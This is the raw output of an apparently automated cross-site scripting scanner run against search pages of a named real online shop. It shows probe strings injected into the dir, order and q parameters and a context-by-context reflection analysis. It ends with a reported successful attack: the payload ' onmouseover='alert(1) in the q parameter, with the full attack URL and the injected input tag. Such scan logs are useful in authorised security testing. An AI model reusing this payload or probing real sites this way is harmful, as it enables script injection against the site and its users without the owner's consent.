https://www.digitalbuyer.com/industrial.html

GET Params:[3]
['dir', 'order', 'q']
_______________________________________________________________________________________________________
https://www.digitalbuyer.com/catalogsearch/result/?dir=(uvw"xyz'yxz</zxy&order=relevance&q=

----------------------------------------------------------------------------------
Attribute Context: [12]
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=8&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=16&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=32&order=relevance&q=" selected>
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=64&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=128&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=all&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=8&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=16&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=32&order=relevance&q=" selected>
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=64&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=128&order=relevance&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&limit=all&order=relevance&q=">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a href="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&mode=list&order=relevance&q=" title="View Products in List Format" class="list">
<a href="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=%28uvw%22xyz%27yxz%3C%2Fzxy&mode=list&order=relevance&q=" title="View Products in List Format" class="list">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
_______________________________________________________________________________________________________
https://www.digitalbuyer.com/catalogsearch/result/?dir=desc&order=(uvw"xyz'yxz</zxy&q=

----------------------------------------------------------------------------------
Attribute Context: [12]
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=8&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=16&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=32&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=" selected>
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=64&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=128&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=all&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=8&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=16&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=32&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=" selected>
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=64&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=128&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">
<option value="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&limit=all&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=">

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a href="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&mode=list&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=" title="View Products in List Format" class="list">
<a href="https://www.digitalbuyer.com/catalogsearch/result/index/?dir=desc&mode=list&order=%28uvw%22xyz%27yxz%3C%2Fzxy&q=" title="View Products in List Format" class="list">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
_______________________________________________________________________________________________________
https://www.digitalbuyer.com/catalogsearch/result/?dir=desc&order=relevance&q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input id="search" type="text" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" class="input-text" maxlength="128" />

----------------------------------------------------------------------------------
HTML Context: [2]
<title>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</title>
<span>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</span>

----------------------------------------------------------------------------------
Script Context: [3]
<script>

	/**
	 * Custom dimensions
	 */
	var dimensions = {"pageType":"searchresults","pageName":"Search results for: '(uvw&quot;xyz'yxz&lt;\/zxy'","resultsCount":0};
	
	if (dimensions && dimensions.hasOwnProperty('pageType'))
	{
		dataLayer.push(dimensions);
	}

</script>
<script type="text/javascript">
    window.layeredBaseUrl = "https://www.digitalbuyer.com/catalogsearch/result/index/?q=%28uvw%22xyz%27yxz%3C%2Fzxy";
    window.layeredLoadMsg = "Please wait...";
</script>
<script>window.zaiusEvents = [{"eventType":"pageview","eventData":[]},{"eventType":"navigation","eventData":{"action":"search","search_term":"(uvw\"xyz'yxz<\/zxy"}}]</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.digitalbuyer.com/catalogsearch/result/?dir=desc&order=relevance&q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input id="search" type="text" name="q" value="' onmouseover='alert(1)" class="input-text" maxlength="128" />
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	False

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	False

Attack Payloads for SCRIPT
[]
